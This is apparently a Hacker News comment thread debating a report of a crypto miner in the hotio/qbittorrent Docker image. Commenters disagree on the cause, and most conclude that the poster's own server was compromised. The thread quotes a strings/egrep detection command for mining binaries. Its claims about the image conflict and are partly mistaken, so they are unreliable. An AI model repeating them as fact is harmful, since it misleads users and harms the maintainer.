Crypto Miner in hotio/qbittorrent
41 comments
·September 23, 2025thephyber
anotherlogin448
The comment was 100% in jest / sarcasm.
OP's system got compromised at some point; the images are clean.
Hell if he didn't want to post his clickbait he easily could have verified with a clean image on a known clean system
bakugo
Brand new account, 7 different comments on this post, all aggressively trying to discredit it.
A bit suspicious, don't you think?
remnant24
Nope. How else are they supposed to make comments if they didn't have an account here yet? I had to create this account just to answer you—is that suspicious too?
ponchel
Currently, on my own system, the docker container of qBitTorrent definitely doesn't seem to use more resources than it should.
ktosobcy
Why use it when there is an official one: `https://github.com/qbittorrent/docker-qbittorrent-nox` ? o_O
Scion9066
Lack of a tagged stable/release version with libtorrent 2.0 for one.
dalmo3
It's a docker image, NOT qbittorrent.
thephyber
For clarity: The post is about a server running a 3rd party docker image of qbittorrent.
But there’s no evidence presented that it was hotio’s docker image on GCHR which was compromised, and there is reason to believe it might be an older, vulnerable version of qbittorrent in the docker image which was compromised.
The vulnerability: (credit crtasm)
https://torrentfreak.com/qbittorrent-web-ui-exploited-to-min...
null
aquova
hotio maintains a lot of Docker images. I suspect that if this is the case, there are a lot of people who would be affected
b-air
Finally made an account on hackernews for this after years of reading. I just checked my Unraid server, I'm running five docker containers from Hotio - Prowlarr, Sonarr, Radarr, Overseerr, and Tautulli. If I remember correctly, I originally chose Hotio's configs due to there being a few extra settings missing from the standard images in the Unraid store. This was all to avoid learning anything about docker at the time, but since then I've gained a few skills so I'd say it's time for me to set up the containers myself. Thanks for posting this, I really only read HN so I would have missed this if it were anywhere else.
anotherlogin448
There's no actual issue.
OP's system got compromised.
IlikeKitties
Alot around the ARR stack which makes it likely to be used by many less knowledgeable users. Nice Grift.
edit: it seems consensus in the thread that OP was pwned and the docker images are clean. Please accept my apologies hotio.
anotherlogin448
And that also goes to show how hilariously wrong OP is.
His system was compromised - hotio's containers are all clean
baobun
Supposedly this image.
https://github.com/hotio/qbittorrent/pkgs/container/qbittorr...
Based on https://github.com/hotio/base
Should be tracable via GitHub Actions logs for anyone signed on - if it is indeed supply-chain and not a qbittorrent exploit or something else.
anotherlogin448
Indeed. OP's investigation proves nothing other their device / system was compromised and provides 0 evidence the container itself is the issue.
wok4899
Omg! I am one of the user! Good find. I maily use for built-in VPN facility, gluetun do not cut out. But now time to re-think. I thought my 2000+ linux iso was causing medium CPU usage. But still lack of GPU, on my unraid server with 50+ docker containers running 24/7 CPU load is 2.31 2.04 2.00 so I wonder mining ever triggered?
Ps. I do have such binary on my machine as well, ps -ef | grep netservlet root 3708105 3665360 0 08:06 pts/2 00:00:00 grep netservlet
anotherlogin448
OP got compromised there's no issue in any hotio container.
Code and CI is all open source.
wok4899
I never have exposed this container to the world ever, and my server do report the existence of such binary. That is the reason based on CPU usage I suspect that mining never triggered.
> ps -ef | grep netservlet > root 3708105 3665360 0 08:06 pts/2 00:00:00 grep netservlet
thephyber
Edit: absolutely make sure you are running the newest version of the image. It patches security issues in the app.
Read this article:
https://torrentfreak.com/qbittorrent-web-ui-exploited-to-min...
It mentions the app will use uPnP to expose itself automatically.
Remember that BitTorrent protocol is P2P, so it likely is accessible from the internet.
My suggestion is to wipe the image, update pull/run the newest version, and change the admin credentials after it starts up.
iogjoertsnbu
that's just grep showing you your own grep process lol. you can do ps -ef | grep foobarbaroof and get the same thing...
bakugo
How long have you been running this container?
Can you check the contents of your qBittorrent.conf?
ZetaTauEpsilon
This output indicates the only process matching netservlet is your own grep, no?
thephyber
Agree.
The article author searched netservlet for these strings to detect the infection:
> $ strings /tmp/netservlet.elf | egrep -i 'stratum|pool|wallet|http|crypto|mining|eth|btc|pool'
ZetaTauEpsilon
Yep. In the author's case it definitely seems they were infected, everything checks out there. I think this commenter however is mistaken when they say they also have the malicious executable discovered by the author. Investigation of my own image (not latest release but within the past few months) shows no evidence of what the author reports
crtasm
If the web UI is exposed that could explain how it got infected:
https://torrentfreak.com/qbittorrent-web-ui-exploited-to-min...
tatoalo
In my case, web UI was behind qbittorrent auth + authelia, haven't seen suspected logs that would trace it back to that, really interesting though!
bakugo
Can you check the contents of your qBittorrent.conf for any suspicious commands?
anotherlogin448
It's 100% your system that caused the issue not hotio's container and there is no miner that exists
Perhaps take a class in sarcasm?
2OEH8eoCRo0
Why do people use these stupid third-party container images?
anotherlogin448
And yet everything is open source and easily auditable. Most likely OP got pwnd and clearly is unable to understand sarcasm.
You all really think that hotio snuck a crypto miner in somehow with all clearly open source code - and not a single person but OP noticed for years?
wok4899
With the SSH/NPM supply chain attack, we all live in fear now. It just need one very smart person to deploy such hack. I'm not saying hotio did something, all I am saying that with new information, we all should check our deployment. Along with OP I'm affected, where I never have exposed the docker to world ever.
So we should not deny the possibility of something off here.
hedsick
You aren’t affected though… the output you posted clearly shows the only response to that process grep was your own grep…
jgilias
Well. An unpaid volunteer found a way how to get paid!
/s
balamatom
Unironically this.
Monero is literally the only crypto that does what it says on the tin. Anonymous, decentralized, minable on commodity hardware. It basically solves internet micropayments.
If you run a website, instead of ads you could provide users with well-behaved "support this site by enabling cryptominer while browsing" toggle that defaults to off.
But no, that'd be "weird". Or in less gullible terms, it spooked some spooks (I mean in the Stirnerian sense, not the one the reader might be thinking of).
And, well, there you have it. 16 years after Satoshi people patting themselves on the shoulder, considering it a resounding success how BTC has become toothless enough for PayPal to adopt, ffs.
And as usual nobody putting 2 and 2 together till some hackers from some hellhole did.
And presumably some other big picture thinkers saw it, too, the ones in the opposite of a hellhole who poured literal billions to turn a global plea for financial liberty into the largest FUD cloud since the Halloween papers.
The article hasn’t proven that the infection is in the GHCR Docker image, let alone the newest version. It only says that they had the image installed, then (unknown time later) noticed the infection.
According to some messages on Hotio’s Discord server from 2023-11-25, qBitTorrent moved from fixed admin credentials to randomized at initialization. I think MrHotio’s message about that crypto miner was likely a joke about people installing the older vulnerable version and the efficiency of unauthorized people installing xrig on servers with default credentials.
If author was pinned to an old version of the docker image and their server had internet-visible IP, they probably got their server infected because of weak security defaults in the app installed on the image.
Edit: Scion9066’s comment shows that dBitTorrent’s previous release version patches multiple security bugs, so vulnerabilities might apply to all versions older than about 1 week, not my guess of 2 years.